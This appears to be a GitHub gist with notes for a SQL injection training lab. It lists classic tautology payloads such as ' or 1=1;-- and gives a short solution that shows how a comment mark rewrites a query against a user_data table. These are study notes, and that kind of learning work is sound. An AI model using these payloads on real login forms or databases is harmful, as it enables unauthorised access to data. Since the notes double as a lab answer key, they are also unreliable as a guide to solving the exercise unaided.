Last active
November 6, 2019 11:54
-
-
Save jipengxiang/3ed6d0fcb15f03ccfc0191b8e8028954 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<input name="password" type="password" size="10" maxlength="8"> | |
# String SQL injection for stage 1 | |
' or 'a'='a';-- | |
' or 1=1;-- | |
abc' or 1=1;-- | |
Select field1, field2 from table where username="" and password ='abc' or 1=1;-- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Solution:
As we can see from the above picture, the SQL statement is
SELECT * FROM user_data WHERE last_name = 'Your Name'
Instead, we can use comment mark to ignore the end single quote.
Attacking Input: Smith' or 1=1; -- ("--" is comment mark, anything followed will be ignored)
Smith' or '1'='1'; --
Then the SQL statement will become:
SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1; --'